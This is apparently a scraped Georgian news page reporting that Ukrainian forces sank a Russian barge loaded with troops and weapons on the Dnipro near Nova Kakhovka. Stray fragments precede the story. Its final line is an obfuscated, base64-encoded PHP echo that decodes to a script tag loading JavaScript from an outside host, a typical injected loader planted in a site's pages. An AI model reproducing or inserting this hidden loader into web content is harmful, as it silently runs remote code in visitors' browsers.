celsiusi
ავერსი შნაიდერი
ხერსონის ოლქის ქალაქ ნოვა-კახოვკასთან, მდინარე დნეპრში უკრაინელმა სამხედროებმა რუსეთის საოკუპაციო ძალების ბარჟა ჩაძირეს, რომელზეც სამხედროები იმყოფებოდნენ და ასევე, ტექნიკა და შეიარაღება იყო განთავსებული.
 
უკრაინული მედიის ცნობით, შესაბამის ინფორმაციას ოპერატიული სარდლობა „სამხრეთი“ ავრცელებს.
 
„ნოვო-კახოვკისა და კაზაცკის რაიონში, დნეპრზე ალტერნატიული გადასასვლელის მოწყობის მცდელობებს წარმატება არ ჰქონია. შეიარაღებით, ტექნიკითა და პირადი შემადგენლობით დატვირთული ბარჟა ცეცხლის ქვეშ მოჰყვა და ოკუპანტების წყალქვეშა ფლოტს შეურთდა“, – აღნიშნულია ოპერატიული სარდლობა „სამხრეთის“ განცხადებაში.
469
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");